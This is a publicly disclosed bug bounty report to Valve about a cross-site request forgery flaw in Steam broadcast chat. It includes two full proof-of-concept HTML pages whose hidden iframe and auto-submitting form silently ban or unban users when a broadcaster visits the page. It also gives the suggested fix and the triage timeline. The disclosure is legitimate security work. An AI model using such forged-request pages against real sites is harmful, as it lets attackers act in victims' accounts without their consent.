CSRF | Ban or unban users in broadcast's chat
State Resolved (Closed)
Disclosed publicly 2019-01-07T20:07:39.180Z
Reported To
Weakness Cross-Site Request Forgery (CSRF)
Bounty $500
Collapse


Timeline
submitted a report to Valve .
2018-07-13T12:28:25.015Z

Steps to reproduce

  • Start broadcast
  • Attacker needs to craft special HTML page
  • Get broadcast's steam id(it contains in URL: https://steamcommunity.com/broadcast/watch/{STEAM ID}/
  • If attacker wants to unban somebody, he needs to create HTML page like this:
<iframe style="display:none" name="csrf-frame"></iframe>
<form action="https://steamcommunity.com/broadcast/ajaxupdateusermute/" method="POST" target="csrf-frame" id="csrf-form">
<input type="hidden" name="broadcaststeamid" value="{STEAM ID}">
<input type="hidden" name="issuersteamid" value="{STEAM ID}">
<input type="hidden" name="chattersteamid" value="{USER'S STEAM ID TO UNBAN}">
<input type="hidden" name="bantype" value="0">
<input type="hidden" name="duration" value="0">
<input type="hidden" name="perm" value="0">
</form>
<script>document.getElementById("csrf-form").submit()</script>
<html>
<head>
    <title>Unban in chat - CSRF</title>
</head>

<body>
<h1>Somebody was unbanned silently :/</h1>
</body>
</html>
  • If attacker wants to permanently ban somebody, he needs to create HTML page like this:
<iframe style="display:none" name="csrf-frame"></iframe>
<form action="https://steamcommunity.com/broadcast/ajaxupdateusermute/" method="POST" target="csrf-frame" id="csrf-form">
<input type="hidden" name="broadcaststeamid" value="{STEAM ID}">
<input type="hidden" name="issuersteamid" value="{STEAM ID}">
<input type="hidden" name="chattersteamid" value="{USER'S STEAM ID TO BAN}">
<input type="hidden" name="bantype" value="1">
<input type="hidden" name="duration" value="0">
<input type="hidden" name="perm" value="1">
</form>
<script>document.getElementById("csrf-form").submit()</script>
<html>
<head>
    <title>Ban in chat - CSRF</title>
</head>

<body>
<h1>Somebody was banned silently :/</h1>
</body>
</html>
  • After that broadcast's creator needs to visit Attacker's page.
  • And somebody will be banned/unbanned.

Video PoC

*I banned myself, because i don't have third Steam account

Fix

Add sessionid parameter to POST request, like this implemented in others requests.

Impact

Attacker can permanently ban or unban other users.

Regards,
Frans

pieceoftoast Activities::Comment
2018-07-17T16:30:53.538Z
Hi @romesful , Thanks for your submission. We are currently reviewing your report and will get back to you once we have additional information to share. Kind regards, @pieceoftoast


pieceoftoast Activities::ReportSeverityUpdated
2018-07-17T17:30:56.876Z


pieceoftoast Activities::BugTriaged
2018-07-17T17:31:00.489Z
@romesful, thank you for your submission! Your report has been validated, and it has been submitted to the appropriate remediation team for review. They will let the HackerOne triage team know the final ruling on this report, and if/when a fix will be implemented. The HackerOne triage team will follow-up after the remediation team has assessed the impact of this report. Please note that the status and severity are subject to change.


romesful Activities::Comment
2018-07-23T11:56:40.451Z
Any updates?


Activities::BountyAwarded
2018-07-31T23:54:21.666Z


chrisk Activities::BugResolved
2018-07-31T23:54:37.260Z
Thanks for the report, we have deployed a fix for the issue.


romesful Activities::AgreedOnGoingPublic
2018-10-08T18:42:36.288Z
I want to disclose this one. Can we do it?


bgilmore Activities::AgreedOnGoingPublic
2019-01-07T20:07:39.139Z


bgilmore Activities::ReportBecamePublic
2019-01-07T20:07:39.204Z